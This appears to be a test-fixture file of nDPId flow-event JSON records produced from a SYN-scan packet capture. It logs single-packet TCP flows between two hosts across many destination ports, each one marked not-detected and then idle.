-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060968,"flow_last_seen":1278275060968,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2909,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 